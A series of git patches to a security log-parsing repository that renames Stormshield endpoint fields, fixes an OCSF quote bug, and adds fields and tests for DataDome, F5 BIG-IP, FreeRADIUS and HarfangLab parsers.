   type: keyword
 
-action.properties.threat_name:
+action.properties.ThreatName:
   description: stormshield property Threat Name
-  name: action.properties.threat_name
+  name: action.properties.ThreatName
   type: keyword
 
-action.properties.type_id:
+action.properties.TypeId:
   description: stormshield property Type ID
-  name: action.properties.type_id
+  name: action.properties.TypeId
   type: keyword
 
-action.properties.type_name:
+action.properties.TypeName:
   description: stormshield property Type Name
-  name: action.properties.type_name
+  name: action.properties.TypeName
   type: keyword
 
 action.record_id:
diff --git a/Stormshield/stormshield-endpoint-security/ingest/parser.yml b/Stormshield/stormshield-endpoint-security/ingest/parser.yml
index 5a7c52b3a..44447383b 100644
--- a/Stormshield/stormshield-endpoint-security/ingest/parser.yml
+++ b/Stormshield/stormshield-endpoint-security/ingest/parser.yml
@@ -169,43 +169,43 @@ stages:
           process.thread.id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.Execution.ThreadID}}"
           action.id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.EventID}}"
           action.record_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.EventRecordID}}"
-          action.properties.opcode: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.OpCode}}"
-          action.properties.task: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.Task}}"
-          action.properties.product_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Product Name')}}"
-          action.properties.product_version: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Product Version')}}"
-          action.properties.detection_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Detection ID')}}"
-          action.properties.detection_time: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Detection Time')}}"
-          action.properties.threat_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Threat ID')}}"
-          action.properties.threat_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Threat Name')}}"
-          action.properties.severity_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Severity ID')}}"
-          action.properties.severity_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Severity Name')}}"
-          action.properties.category_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Category ID')}}"
-          action.properties.category_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Category Name')}}"
-          action.properties.fwlink: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('FWLink')}}"
-          action.properties.status_code: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Status Code')}}"
-          action.properties.state: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('State')}}"
-          action.properties.source_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Source ID')}}"
-          action.properties.source_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Source Name')}}"
-          action.properties.process_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Process Name')}}"
-          action.properties.detection_user: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Detection User')}}"
-          action.properties.path: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Path')}}"
-          action.properties.origin_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Origin ID')}}"
-          action.properties.origin_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Origin Name')}}"
-          action.properties.execution_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Execution ID')}}"
-          action.properties.execution_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Execution Name')}}"
-          action.properties.type_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Type ID')}}"
-          action.properties.type_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Type Name')}}"
-          action.properties.pre_execution_status: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Pre Execution Status')}}"
-          action.properties.action_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Action ID')}}"
-          action.properties.action_name: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Action Name')}}"
-          action.properties.error_code: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Error Code')}}"
-          action.properties.error_description: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Error Description')}}"
-          action.properties.post_clean_status: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Post Clean Status')}}"
-          action.properties.additional_actions_id: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Additional Actions ID')}}"
-          action.properties.additional_actions_string: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Additional Actions String')}}"
-          action.properties.remediation_user: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Remediation User')}}"
-          action.properties.security_intelligence_version: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Security intelligence Version')}}"
-          action.properties.engine_version: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Engine Version')}}"
+          action.properties.Opcode: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.OpCode}}"
+          action.properties.Task: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.System.Task}}"
+          action.properties.ProductName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Product Name')}}"
+          action.properties.ProductVersion: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Product Version')}}"
+          action.properties.DetectionId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Detection ID')}}"
+          action.properties.DetectionTime: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Detection Time')}}"
+          action.properties.ThreatId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Threat ID')}}"
+          action.properties.ThreatName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Threat Name')}}"
+          action.properties.SeverityId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Severity ID')}}"
+          action.properties.SeverityName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Severity Name')}}"
+          action.properties.CategoryId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Category ID')}}"
+          action.properties.CategoryName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Category Name')}}"
+          action.properties.Fwlink: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('FWLink')}}"
+          action.properties.StatusCode: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Status Code')}}"
+          action.properties.State: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('State')}}"
+          action.properties.SourceId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Source ID')}}"
+          action.properties.SourceName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Source Name')}}"
+          action.properties.ProcessName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Process Name')}}"
+          action.properties.DetectionUser: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Detection User')}}"
+          action.properties.Path: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Path')}}"
+          action.properties.OriginId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Origin ID')}}"
+          action.properties.OriginName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Origin Name')}}"
+          action.properties.ExecutionId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Execution ID')}}"
+          action.properties.ExecutionName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Execution Name')}}"
+          action.properties.TypeId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Type ID')}}"
+          action.properties.TypeName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Type Name')}}"
+          action.properties.PreExecutionStatus: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Pre Execution Status')}}"
+          action.properties.ActionId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Action ID')}}"
+          action.properties.ActionName: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Action Name')}}"
+          action.properties.ErrorCode: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Error Code')}}"
+          action.properties.ErrorDescription: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Error Description')}}"
+          action.properties.PostCleanStatus: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Post Clean Status')}}"
+          action.properties.AdditionalActionsId: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Additional Actions ID')}}"
+          action.properties.AdditionalActionsString: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Additional Actions String')}}"
+          action.properties.RemediationUser: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Remediation User')}}"
+          action.properties.SecurityIntelligenceVersion: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Security intelligence Version')}}"
+          action.properties.EngineVersion: "{{json_event.message.SpecificData.ExtraData.__EvtXml.Event.EventData.get('Engine Version')}}"
         filter: "{{json_event.message.Type == 20048}}"
 
       - set:
diff --git a/Stormshield/stormshield-endpoint-security/tests/test_type_20048_1.json b/Stormshield/stormshield-endpoint-security/tests/test_type_20048_1.json
index 76705eb03..4cf024c43 100644
--- a/Stormshield/stormshield-endpoint-security/tests/test_type_20048_1.json
+++ b/Stormshield/stormshield-endpoint-security/tests/test_type_20048_1.json
@@ -20,42 +20,42 @@
     "action": {
       "id": "1117",
       "properties": {
-        "action_id": "2",
-        "action_name": "Quarantine",
-        "additional_actions_id": "0",
-        "additional_actions_string": "No additional actions required",
-        "category_id": "8",
-        "category_name": "Trojan",
-        "detection_id": "{9C26ADFE-43AA-4884-9765-A2EC223DC7E0}",
-        "detection_time": "2024-03-22T14:01:20.550Z",
-        "detection_user": "DESKTOP-001\\Lab",
-        "engine_version": "AM: 1.1.24020.9, NIS: 1.1.24020.9",
-        "error_code": "0x00000000",
-        "error_description": "The operation completed successfully. ",
-        "execution_id": "0",
-        "execution_name": "Unknown",
-        "fwlink": "https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0",
-        "origin_id": "4",
-        "origin_name": "Internet",
-        "path": "file:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1; webfile:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048",
-        "post_clean_status": "0",
-        "pre_execution_status": "0",
-        "process_name": "Unknown",
-        "product_name": "Microsoft Defender Antivirus",
-        "product_version": "4.18.23110.3",
-        "remediation_user": "NT AUTHORITY\\SYSTEM",
-        "security_intelligence_version": "AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0",
-        "severity_id": "5",
-        "severity_name": "Severe",
-        "source_id": "4",
-        "source_name": "Downloads and attachments",
-        "state": "2",
-        "status_code": "4",
-        "task": "0",
-        "threat_id": "2147818424",
-        "threat_name": "Trojan:Win32/BatTamper.A",
-        "type_id": "0",
-        "type_name": "Concrete"
+        "ActionId": "2",
+        "ActionName": "Quarantine",
+        "AdditionalActionsId": "0",
+        "AdditionalActionsString": "No additional actions required",
+        "CategoryId": "8",
+        "CategoryName": "Trojan",
+        "DetectionId": "{9C26ADFE-43AA-4884-9765-A2EC223DC7E0}",
+        "DetectionTime": "2024-03-22T14:01:20.550Z",
+        "DetectionUser": "DESKTOP-001\\Lab",
+        "EngineVersion": "AM: 1.1.24020.9, NIS: 1.1.24020.9",
+        "ErrorCode": "0x00000000",
+        "ErrorDescription": "The operation completed successfully. ",
+        "ExecutionId": "0",
+        "ExecutionName": "Unknown",
+        "Fwlink": "https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/BatTamper.A&threatid=2147818424&enterprise=0",
+        "OriginId": "4",
+        "OriginName": "Internet",
+        "Path": "file:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1; webfile:_C:\\Users\\Lab\\Downloads\\TurnOffAV.ps1|https://github.com/|pid:13760,ProcessStart:133555896788321048",
+        "PostCleanStatus": "0",
+        "PreExecutionStatus": "0",
+        "ProcessName": "Unknown",
+        "ProductName": "Microsoft Defender Antivirus",
+        "ProductVersion": "4.18.23110.3",
+        "RemediationUser": "NT AUTHORITY\\SYSTEM",
+        "SecurityIntelligenceVersion": "AV: 1.407.619.0, AS: 1.407.619.0, NIS: 1.407.619.0",
+        "SeverityId": "5",
+        "SeverityName": "Severe",
+        "SourceId": "4",
+        "SourceName": "Downloads and attachments",
+        "State": "2",
+        "StatusCode": "4",
+        "Task": "0",
+        "ThreatId": "2147818424",
+        "ThreatName": "Trojan:Win32/BatTamper.A",
+        "TypeId": "0",
+        "TypeName": "Concrete"
       },
       "record_id": "613"
     },

From 3b400f99bfbbdc2499dd26883b08176aa8494a93 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 19 Sep 2024 11:20:23 +0200
Subject: [PATCH 058/317] fix(OCSF): remove single quote

apply @lvoloshyn-sekoia's comment
---
 OCSF/ocsf/ingest/parser.yml                       | 2 +-
 OCSF/ocsf/tests/test_vulnerability_finding_1.json | 3 +--
 2 files changed, 2 insertions(+), 3 deletions(-)

diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 7284638f6..19713e433 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -940,7 +940,7 @@ stages:
           vulnerability.score.version: "{{parse_event.message.vulnerabilities[0].cve.cvss.version}}"
           vulnerability.description: "{{parse_event.message.vulnerabilities[0].desc}}"
           vulnerability.score.base: "{{parse_event.message.vulnerabilities[0].cve.cvss.base_score | float}}"
-          vulnerability.severity: "{{parse_event.message.vulnerabilities[0].severity}}'"
+          vulnerability.severity: "{{parse_event.message.vulnerabilities[0].severity}}"
           vulnerability.scanner.vendor: "{{parse_event.message.vulnerabilities[0].vendor_name}}"
         filter: "{{parse_event.message.get('vulnerabilities', []) | length > 0}}"
 
diff --git a/OCSF/ocsf/tests/test_vulnerability_finding_1.json b/OCSF/ocsf/tests/test_vulnerability_finding_1.json
index 47b46332d..fbabdddd0 100644
--- a/OCSF/ocsf/tests/test_vulnerability_finding_1.json
+++ b/OCSF/ocsf/tests/test_vulnerability_finding_1.json
@@ -32,8 +32,7 @@
       "id": "CVE-2023-1255",
       "scanner": {
         "vendor": "NVD"
-      },
-      "severity": "'"
+      }
     }
   }
 }
\ No newline at end of file

From 6647c5f0ee2acb0d157536e4c4e0e43c9c5c0304 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Thu, 19 Sep 2024 15:04:41 +0300
Subject: [PATCH 059/317] DataDome - extract more fields

---
 Datadome/datadome-protection/_meta/fields.yml | 29 +++++++++++++++++++
 .../datadome-protection/ingest/parser.yml     |  7 +++++
 .../datadome-protection/tests/test_alert.json |  8 +++++
 .../tests/test_alert_with_duration.json       |  8 +++++
 4 files changed, 52 insertions(+)

diff --git a/Datadome/datadome-protection/_meta/fields.yml b/Datadome/datadome-protection/_meta/fields.yml
index e69de29bb..e1bcc0e85 100644
--- a/Datadome/datadome-protection/_meta/fields.yml
+++ b/Datadome/datadome-protection/_meta/fields.yml
@@ -0,0 +1,29 @@
+datadome.country_count:
+  description: ''
+  name: datadome.country_count
+  type: number
+
+datadome.ip_count:
+  description: ''
+  name: datadome.ip_count
+  type: number
+
+datadome.peak_speed:
+  description: ''
+  name: datadome.peak_speed
+  type: number
+
+datadome.requests_count:
+  description: ''
+  name: datadome.requests_count
+  type: number
+
+datadome.ua_count:
+  description: ''
+  name: datadome.ua_count
+  type: number
+
+datadome.url_count:
+  description: ''
+  name: datadome.url_count
+  type: number
diff --git a/Datadome/datadome-protection/ingest/parser.yml b/Datadome/datadome-protection/ingest/parser.yml
index 07ff32e88..509c7364a 100644
--- a/Datadome/datadome-protection/ingest/parser.yml
+++ b/Datadome/datadome-protection/ingest/parser.yml
@@ -56,3 +56,10 @@ stages:
           cloud.account.name: "{{parsed_event.message.accountName}}"
           host.name: "{{parsed_event.message.endpointName}}"
           threat.indicator.name: "{{parsed_event.message.threatName}}"
+
+          datadome.requests_count: "{{parsed_event.message.requestsCount.replace(',', '') | int}}"
+          datadome.peak_speed: "{{parsed_event.message.peakSpeed.replace(',', '') | int}}"
+          datadome.ip_count: "{{parsed_event.message.ipCount.replace(',', '') | int}}"
+          datadome.ua_count: "{{parsed_event.message.uaCount.replace(',', '') | int}}"
+          datadome.country_count: "{{parsed_event.message.countryCount.replace(',', '') | int}}"
+          datadome.url_count: "{{parsed_event.message.urlCount.replace(',', '') | int}}"
diff --git a/Datadome/datadome-protection/tests/test_alert.json b/Datadome/datadome-protection/tests/test_alert.json
index a1c4e1027..0d535d93b 100644
--- a/Datadome/datadome-protection/tests/test_alert.json
+++ b/Datadome/datadome-protection/tests/test_alert.json
@@ -20,6 +20,14 @@
         "name": "Example account"
       }
     },
+    "datadome": {
+      "country_count": 123456789,
+      "ip_count": 123456789,
+      "peak_speed": 0,
+      "requests_count": 123456789,
+      "ua_count": 123456789,
+      "url_count": 123456789
+    },
     "host": {
       "name": "WEB (default)"
     },
diff --git a/Datadome/datadome-protection/tests/test_alert_with_duration.json b/Datadome/datadome-protection/tests/test_alert_with_duration.json
index 0dd928c38..22a05ed8c 100644
--- a/Datadome/datadome-protection/tests/test_alert_with_duration.json
+++ b/Datadome/datadome-protection/tests/test_alert_with_duration.json
@@ -28,6 +28,14 @@
         "name": "Account name"
       }
     },
+    "datadome": {
+      "country_count": 17,
+      "ip_count": 393,
+      "peak_speed": 1457,
+      "requests_count": 10558,
+      "ua_count": 82,
+      "url_count": 2221
+    },
     "host": {
       "name": "Endpoint"
     },

From ccf710da39758cd830cbc5bf128adbf8e33879b2 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Thu, 19 Sep 2024 17:06:19 +0300
Subject: [PATCH 060/317] F5 Big-Ip: parse Rule event wo details

---
 F5 Networks/f5-big-ip/ingest/parser.yml     |  3 ++-
 F5 Networks/f5-big-ip/tests/test_rule8.json | 24 +++++++++++++++++++++
 2 files changed, 26 insertions(+), 1 deletion(-)
 create mode 100644 F5 Networks/f5-big-ip/tests/test_rule8.json

diff --git a/F5 Networks/f5-big-ip/ingest/parser.yml b/F5 Networks/f5-big-ip/ingest/parser.yml
index 4ccce0e6b..d100bdf97 100644
--- a/F5 Networks/f5-big-ip/ingest/parser.yml	
+++ b/F5 Networks/f5-big-ip/ingest/parser.yml	
@@ -8,7 +8,7 @@ pipeline:
       name: grok.match
       properties:
         output_field: message
-        pattern: '\s?(%{CRON_LOG}|%{LOGGER_LOG}|%{SSH_LOG}|%{RULE_LOG}|%{AUDIT_LOG}|%{ARROW}|%{VPN_LOG})'
+        pattern: '\s?(%{CRON_LOG}|%{LOGGER_LOG}|%{SSH_LOG}|%{RULE_LOG}|%{RULE_LOG_REASON_ONLY}|%{AUDIT_LOG}|%{ARROW}|%{VPN_LOG})'
         custom_patterns:
           TLS: "TLSv"
           HEADER: '%{WORD:action_type}\[\d*\]'
@@ -35,6 +35,7 @@ pipeline:
           RULE_HTTP_REQUEST: "<HTTP_REQUEST>: LOGS: %{RULE_LOG_MESSAGE:rule_message}"
           RULE_HTTP_RESPONSE: "<HTTP_RESPONSE_RELEASE>: %{IPORHOST:destination_ip}:%{POSINT:destination_port}: HTTP: %{POSINT:http_response_status_code} response to( %{IPORHOST:destination_ip}:%{POSINT:destination_port})? from( %{IPORHOST:source_ip}:%{POSINT:source_port} )?URL: %{NOTSPACE:url_original} %{DATA} %{TLS:tls_version_protocol}%{NUMBER:tls_version}"
           RULE_LOG: "%{HEADER}: Rule %{NOTSPACE:rule_name} (%{RULE_HTTP_REQUEST}|%{RULE_HTTP_RESPONSE})"
+          RULE_LOG_REASON_ONLY: '(%{HEADER}:\s?)? Rule %{NOTSPACE:rule_name} \: %{GREEDYDATA:rule_message}'
 
           # audit message
           AUDIT_LOG: '%{HEADER}:\s(\d*:\d*: )AUDIT - %{GREEDYDATA:audit_message}'
diff --git a/F5 Networks/f5-big-ip/tests/test_rule8.json b/F5 Networks/f5-big-ip/tests/test_rule8.json
new file mode 100644
index 000000000..17a6db8ab
--- /dev/null
+++ b/F5 Networks/f5-big-ip/tests/test_rule8.json	
@@ -0,0 +1,24 @@
+{
+  "input": {
+    "message": " Rule /Common/irule_insert_vs_name : le nom de la vs a inserer est example.com"
+  },
+  "expected": {
+    "message": " Rule /Common/irule_insert_vs_name : le nom de la vs a inserer est example.com",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "reason": "le nom de la vs a inserer est example.com",
+      "type": [
+        "info"
+      ]
+    },
+    "os": {
+      "family": "linux",
+      "platform": "linux"
+    },
+    "rule": {
+      "name": "/Common/irule_insert_vs_name"
+    }
+  }
+}
\ No newline at end of file

From 9620fe97184621d0b2202d48ba91959998aa889a Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Thu, 19 Sep 2024 17:18:51 +0300
Subject: [PATCH 061/317] Freeradius - extract server name

---
 FreeRADIUS/freeradius/ingest/parser.yml       |  3 +-
 .../tests/test_ignoring_request.json          |  3 ++
 .../test_ignoring_request_non_default.json    | 39 +++++++++++++++++++
 3 files changed, 44 insertions(+), 1 deletion(-)
 create mode 100644 FreeRADIUS/freeradius/tests/test_ignoring_request_non_default.json

diff --git a/FreeRADIUS/freeradius/ingest/parser.yml b/FreeRADIUS/freeradius/ingest/parser.yml
index 2c93113c1..90da80fc5 100644
--- a/FreeRADIUS/freeradius/ingest/parser.yml
+++ b/FreeRADIUS/freeradius/ingest/parser.yml
@@ -9,7 +9,7 @@ pipeline:
         pattern: "%{USUAL}|%{IGNREQ}"
         custom_patterns:
           USUAL: '\s?\(%{INT}\)\s%{DATA:event_outcome}(\s\((eap_peap\:\s)?%{GREEDYDATA:event_reason}\))?\)?:\s\[%{USER}\]\s\(from\sclient\s%{DATA:origin}\sport\s%{INT:client_port}(\scli\s(%{MAC:client_mac}|%{IP:client_ip}|(?P<client_mac_unsplitted>[0-9A-Fa-f]{12})))?(\svia\s%{PROTOCOL})?\)'
-          IGNREQ: '\s?%{DATA:event_outcome} (%{IP:destination_ip}|\*) port %{INT:destination_port} bound to server default from unknown client %{IP:client_ip} port %{INT:client_port} proto %{DATA:network_transport}'
+          IGNREQ: '\s?%{DATA:event_outcome} (%{IP:destination_ip}|\*) port %{INT:destination_port} bound to server %{DATA:server_name} from unknown client %{IP:client_ip} port %{INT:client_port} proto %{DATA:network_transport}'
           USER: "%{USER_EMAIL:user_email}|%{HOST}|%{DOM}|%{DATA:user_name}"
           HOST: "host/%{HOSTNAME:client_domain}"
           DOM: '%{DATA:user_domain}\\%{HOSTNAME:user_name}'
@@ -43,6 +43,7 @@ stages:
           network.protocol: "{{ parsing.message.network_protocol }}"
           network.transport: "{{ parsing.message.network_transport }}"
           freeradius.outcome: "{{ parsing.message.event_outcome }}"
+          host.name: "{{ parsing.message.server_name }}"
 
       - set:
           source.ip: "{{ parsing.message.client_ip }}"
diff --git a/FreeRADIUS/freeradius/tests/test_ignoring_request.json b/FreeRADIUS/freeradius/tests/test_ignoring_request.json
index 4a7268614..595858b70 100644
--- a/FreeRADIUS/freeradius/tests/test_ignoring_request.json
+++ b/FreeRADIUS/freeradius/tests/test_ignoring_request.json
@@ -19,6 +19,9 @@
     "freeradius": {
       "outcome": "Ignoring request to auth address"
     },
+    "host": {
+      "name": "default"
+    },
     "network": {
       "transport": "udp"
     },
diff --git a/FreeRADIUS/freeradius/tests/test_ignoring_request_non_default.json b/FreeRADIUS/freeradius/tests/test_ignoring_request_non_default.json
new file mode 100644
index 000000000..cdd39b172
--- /dev/null
+++ b/FreeRADIUS/freeradius/tests/test_ignoring_request_non_default.json
@@ -0,0 +1,39 @@
+{
+  "input": {
+    "message": "Ignoring request to auth address * port 1823 bound to server Wifi-LDAP from unknown client 1.2.2.3 port 1645 proto udp"
+  },
+  "expected": {
+    "message": "Ignoring request to auth address * port 1823 bound to server Wifi-LDAP from unknown client 1.2.2.3 port 1645 proto udp",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "freeradius.authentication",
+      "type": [
+        "info"
+      ]
+    },
+    "destination": {
+      "port": 1823
+    },
+    "freeradius": {
+      "outcome": "Ignoring request to auth address"
+    },
+    "host": {
+      "name": "Wifi-LDAP"
+    },
+    "network": {
+      "transport": "udp"
+    },
+    "related": {
+      "ip": [
+        "1.2.2.3"
+      ]
+    },
+    "source": {
+      "address": "1.2.2.3",
+      "ip": "1.2.2.3",
+      "port": 1645
+    }
+  }
+}
\ No newline at end of file

From 79e0606c0e679421ab975830f2e9af454c8cc7e9 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 19 Sep 2024 17:07:23 +0200
Subject: [PATCH 062/317] fix(Harfanglab): add new action.properties fields in
 the taxonomy

---
 HarfangLab/harfanglab/_meta/fields.yml  | 40 +++++++++++++++++++++++++
 HarfangLab/harfanglab/ingest/parser.yml | 16 +++++++---
 2 files changed, 52 insertions(+), 4 deletions(-)

diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml
index aded5e2de..e57a69bca 100644
--- a/HarfangLab/harfanglab/_meta/fields.yml
+++ b/HarfangLab/harfanglab/_meta/fields.yml
@@ -88,6 +88,21 @@ action.properties.CategoryName:
   name: action.properties.CategoryName
   type: keyword
 
+action.properties.CertIssuerName:
+  description: ''
+  name: action.properties.CertIssuerName
+  type: keyword
+
+action.properties.CertSerialNumber:
+  description: ''
+  name: action.properties.CertSerialNumber
+  type: keyword
+
+action.properties.CertThumbprint:
+  description: ''
+  name: action.properties.CertThumbprint
+  type: keyword
+
 action.properties.ClientProcessId:
   description: ''
   name: action.properties.ClientProcessId
@@ -393,6 +408,11 @@ action.properties.PostCleanStatus:
   name: action.properties.PostCleanStatus
   type: keyword
 
+action.properties.PreAuthType:
+  description: ''
+  name: action.properties.PreAuthType
+  type: keyword
+
 action.properties.PreExecutionStatus:
   description: ''
   name: action.properties.PreExecutionStatus
@@ -518,6 +538,16 @@ action.properties.SecurityintelligenceVersion:
   name: action.properties.SecurityintelligenceVersion
   type: keyword
 
+action.properties.ServiceName:
+  description: ''
+  name: action.properties.ServiceName
+  type: keyword
+
+action.properties.ServiceSid:
+  description: ''
+  name: action.properties.ServiceSid
+  type: keyword
+
 action.properties.SeverityID:
   description: ''
   name: action.properties.SeverityID
@@ -688,6 +718,16 @@ action.properties.ThreatName:
   name: action.properties.ThreatName
   type: keyword
 
+action.properties.TicketEncryptionType:
+  description: ''
+  name: action.properties.TicketEncryptionType
+  type: keyword
+
+action.properties.TicketOptions:
+  description: ''
+  name: action.properties.TicketOptions
+  type: keyword
+
 action.properties.TotalSignatureCount:
   description: ''
   name: action.properties.TotalSignatureCount
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 8a357b33f..df5369509 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -292,6 +292,9 @@ stages:
           action.properties.CallerProcessName: "{{json_event.message.event_data.get('CallerProcessName')}}"
           action.properties.CategoryID: "{{json_event.message.event_data.get('Category ID')}}"
           action.properties.CategoryName: "{{json_event.message.event_data.get('Category Name')}}"
+          action.properties.CertIssuerName: "{{json_event.message.event_data.get('CertIssuerName')}}"
+          action.properties.CertSerialNumber: "{{json_event.message.event_data.get('CertSerialNumber')}}"
+          action.properties.CertThumbprint: "{{json_event.message.event_data.get('CertThumbprint')}}"
           action.properties.ClientProcessId: "{{json_event.message.event_data.get('ClientProcessId')}}"
           action.properties.ClientProcessStartKey: "{{json_event.message.event_data.get('ClientProcessStartKey')}}"
           action.properties.DetectionID: "{{json_event.message.event_data.get('Detection ID')}}"
@@ -353,9 +356,10 @@ stages:
           action.properties.Platformversion: "{{json_event.message.event_data.get('Platform version')}}"
           action.properties.PolicyBits: "{{json_event.message.event_data.get('PolicyBits')}}"
           action.properties.PostCleanStatus: "{{json_event.message.event_data.get('Post Clean Status')}}"
+          action.properties.PreAuthType: "{{json_event.message.event_data.get('PreAuthType')}}"
           action.properties.PreExecutionStatus: "{{json_event.message.event_data.get('Pre Execution Status')}}"
-          action.properties.ProcessName: "{{json_event.message.event_data.get('Process Name') or json_event.message.event_data.get('ProcessName')}}"
           action.properties.ProcessId: "{{json_event.message.event_data.get('ProcessId')}}"
+          action.properties.ProcessName: "{{json_event.message.event_data.get('Process Name') or json_event.message.event_data.get('ProcessName')}}"
           action.properties.ProcessNameBuffer: "{{json_event.message.event_data.get('ProcessNameBuffer')}}"
           action.properties.ProcessNameLength: "{{json_event.message.event_data.get('ProcessNameLength')}}"
